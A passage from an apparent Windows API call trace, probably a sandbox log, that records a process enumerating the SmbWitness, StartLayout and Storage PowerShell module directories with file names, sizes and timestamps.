lpOldMode=0x1b7fe420) returned 1 [0226.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.656] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0226.656] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0226.656] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.657] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.657] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.657] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0226.657] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0226.657] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0226.657] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.658] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.658] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0226.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.658] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.658] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0226.658] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0226.658] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.658] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.659] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.659] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0226.659] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0226.659] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0226.660] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 0 [0226.660] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.660] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness\\smbwitness.psd1")) returned 0x20 [0226.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.660] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0226.660] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0226.660] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.661] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.661] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0226.661] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0226.662] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 0 [0226.662] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.662] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0226.662] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0226.662] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.662] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.662] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0226.663] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0226.663] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.663] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.663] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0226.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.663] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.663] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0226.663] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0226.664] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.664] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.664] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0226.664] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0226.664] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 0 [0226.665] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.665] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout\\startlayout.psd1")) returned 0x20 [0226.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.665] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0226.665] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", lpFilePart=0x0) returned 0x3b [0226.665] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.666] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.666] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63de, dwReserved0=0x0, dwReserved1=0x0, 